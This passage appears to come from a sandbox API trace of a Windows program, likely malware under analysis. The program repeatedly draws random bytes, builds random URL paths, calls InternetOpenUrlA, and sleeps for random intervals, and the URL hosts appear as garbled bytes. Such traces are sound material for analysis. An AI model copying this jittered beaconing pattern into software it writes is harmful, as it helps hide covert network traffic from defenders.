pbBuffer=0x46ffd5d) returned 0x0 [0175.075] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.075] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.075] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.075] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.075] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.075] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.075] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.076] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.076] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.076] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.076] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.076] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.076] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.077] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.077] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.077] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.077] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.077] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.077] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.077] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.077] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.077] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.078] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.078] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0175.078] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.078] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.078] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.078] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.078] GetProcessHeap () returned 0x440000 [0175.078] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x472b10 [0175.078] lstrcpyA (in: lpString1=0x472b10, lpString2="\x80t¡\x03" | out: lpString1="\x80t¡\x03") returned="\x80t¡\x03" [0175.079] lstrcatA (in: lpString1="\x80t¡\x03", lpString2="/z3yqwYoxr9rxs0atlops1paw3b8a9rjClxkWy/xarhsqrnyUr3humV9b2Sj6qyuK79g8hd/3n158pQ1lLcToiagrbxYyezLmyF/" | out: lpString1="\x80t¡\x03/z3yqwYoxr9rxs0atlops1paw3b8a9rjClxkWy/xarhsqrnyUr3humV9b2Sj6qyuK79g8hd/3n158pQ1lLcToiagrbxYyezLmyF/") returned="\x80t¡\x03/z3yqwYoxr9rxs0atlops1paw3b8a9rjClxkWy/xarhsqrnyUr3humV9b2Sj6qyuK79g8hd/3n158pQ1lLcToiagrbxYyezLmyF/" [0175.079] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0175.079] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x80t¡\x03/z3yqwYoxr9rxs0atlops1paw3b8a9rjClxkWy/xarhsqrnyUr3humV9b2Sj6qyuK79g8hd/3n158pQ1lLcToiagrbxYyezLmyF/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0175.079] GetProcessHeap () returned 0x440000 [0175.079] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x472b10 | out: hHeap=0x440000) returned 1 [0175.079] GetProcessHeap () returned 0x440000 [0175.079] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a17480 | out: hHeap=0x440000) returned 1 [0175.079] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0175.081] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0175.081] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.081] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0175.081] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0175.081] Sleep (dwMilliseconds=0x16015) [0175.238] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.238] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0175.238] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.238] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0175.238] GetProcessHeap () returned 0x440000 [0175.238] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x95) returned 0x3a18060 [0175.238] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.238] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0175.239] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.239] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a18061, cbBuffer=0x28, dwFlags=0x2 | out: pbBuffer=0x3a18061) returned 0x0 [0175.239] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.239] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.240] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.240] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0175.240] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.240] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.240] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.240] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.241] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.241] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.241] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.241] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.241] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.241] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.241] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.241] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.241] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.241] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.242] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.242] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.242] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.242] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0175.242] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.242] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.242] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.242] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.242] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.242] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.242] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.243] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.243] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.243] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.243] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.243] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.243] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.243] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0175.243] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.244] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0175.244] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.244] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.244] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.244] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.244] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.244] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.244] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.244] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.245] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.245] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.245] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.245] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.245] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.245] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.245] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.245] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0175.245] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.245] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.246] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.246] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0175.246] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.246] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a18089, cbBuffer=0x11, dwFlags=0x2 | out: pbBuffer=0x3a18089) returned 0x0 [0175.246] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.246] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.246] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.246] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.247] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.247] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0175.247] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.247] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0175.247] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.247] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.247] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.247] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0175.247] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.247] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.247] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.248] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0175.248] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.248] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.248] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.248] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.248] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.248] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.248] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.248] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0175.248] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.248] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.249] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.249] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0175.249] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.249] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0175.249] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.249] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1809a, cbBuffer=0x18, dwFlags=0x2 | out: pbBuffer=0x3a1809a) returned 0x0 [0175.249] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.249] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.250] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.250] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.250] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.250] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.250] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.250] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.250] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.250] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.251] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.251] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0175.251] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.251] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.251] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.251] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.251] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.251] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.252] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.252] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.252] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.252] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.252] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.252] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.252] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.252] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.252] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.252] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.253] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.253] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0175.253] GetProcessHeap () returned 0x440000 [0175.253] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x4726f0 [0175.253] lstrcpyA (in: lpString1=0x4726f0, lpString2="`\x80¡\x03" | out: lpString1="`\x80¡\x03") returned="`\x80¡\x03" [0175.253] lstrcatA (in: lpString1="`\x80¡\x03", lpString2="/z3v68douqbvmx9csfLwAso5HviWChkgkql6qV6t/Exi94g86u2ifm8z6/v9twijo8vtdFmdgehhaLkXi/" | out: lpString1="`\x80¡\x03/z3v68douqbvmx9csfLwAso5HviWChkgkql6qV6t/Exi94g86u2ifm8z6/v9twijo8vtdFmdgehhaLkXi/") returned="`\x80¡\x03/z3v68douqbvmx9csfLwAso5HviWChkgkql6qV6t/Exi94g86u2ifm8z6/v9twijo8vtdFmdgehhaLkXi/" [0175.253] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0175.253] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="`\x80¡\x03/z3v68douqbvmx9csfLwAso5HviWChkgkql6qV6t/Exi94g86u2ifm8z6/v9twijo8vtdFmdgehhaLkXi/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0175.254] GetProcessHeap () returned 0x440000 [0175.254] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4726f0 | out: hHeap=0x440000) returned 1 [0175.254] GetProcessHeap () returned 0x440000 [0175.254] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a18060 | out: hHeap=0x440000) returned 1 [0175.254] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0175.254] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0175.254] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0175.254] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0175.255] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0175.255] Sleep (dwMilliseconds=0x16a27) [0175.423] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 